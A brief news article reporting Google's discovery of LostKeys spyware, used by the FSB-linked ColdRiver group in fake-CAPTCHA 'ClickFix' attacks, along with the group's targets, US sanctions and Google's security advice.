Google has announced (via Android Headlines) the detection of a new piece of spyware known as LostKeys, utilized by the ColdRiver hacker group associated with the Russian FSB. This software is designed to steal files and system data from Western organizations.

According to the Google Threat Intelligence Group (GTIG), LostKeys is employed in specialized ClickFix-style attacks that rely on social engineering and begin with a fake CAPTCHA. Victims are tricked into executing malicious PowerShell scripts that pave the way for downloading and executing additional malware. The primary aim is to install LostKeys, which operates like a digital vacuum, extracting files, directories, and system information. Hackers also leverage other malware, including SPICA, to obtain documents.

The ColdRiver group has been active since 2017 and is known by other names such as Star Blizzard and Callisto Group. Reports indicate that it has intensified its activities in recent years, especially since Russia's invasion of Ukraine. The group specializes in cyber espionage, targeting government and defense institutions, think tanks, politicians, journalists, and non-governmental organizations.

The U.S. has already imposed sanctions against certain members of the group and announced a reward of $10 million for information leading to their capture.

Google specialists emphasize the need to strengthen cybersecurity, particularly for organizations that may become potential victims of ColdRiver attacks. They recommend utilizing Google’s advanced protection and regularly updating security systems to prevent similar threats.